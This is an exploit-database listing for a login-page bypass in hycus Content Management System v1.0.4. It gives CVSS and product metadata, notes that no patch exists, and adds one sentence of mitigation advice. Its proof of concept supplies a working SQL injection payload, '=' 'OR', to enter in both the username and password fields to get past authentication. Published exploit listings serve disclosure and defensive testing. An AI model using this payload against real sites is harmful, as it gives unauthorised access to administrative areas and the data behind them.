header-logo
Suggest Exploit
vendor:
hycus Content Management System
by:
Berk Dusunur
7.5
CVSS
HIGH
Login Page Bypass
287
CWE
Product Name: hycus Content Management System
Affected Version From: 1.0.4
Affected Version To: 1.0.4
Patch Exists: NO
Related CWE: N/A
CPE: a:hycus:hycus_content_management_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Pardus, Debian
2018

hycus Content Management System v1.0.4 Login Page Bypass

A login page bypass vulnerability exists in hycus Content Management System v1.0.4. An attacker can use the payload '=' 'OR' for both username and password to bypass the login page.

Mitigation:

Ensure that authentication credentials are properly validated and that the application is not vulnerable to SQL injection.
Source

Exploit-DB raw data:

# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
# Google Dork:N/A
# Date: 28.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://www.hycus.com/
# Software Link: http://demosite.center/hycus/
# Version: 1.0.4
# Tested on: Pardus / Debian Web Server
# CVE : N/A

#Proof Of Concept

use login bypass payload for username=   '=' 'OR'   for password=   '=' 'OR'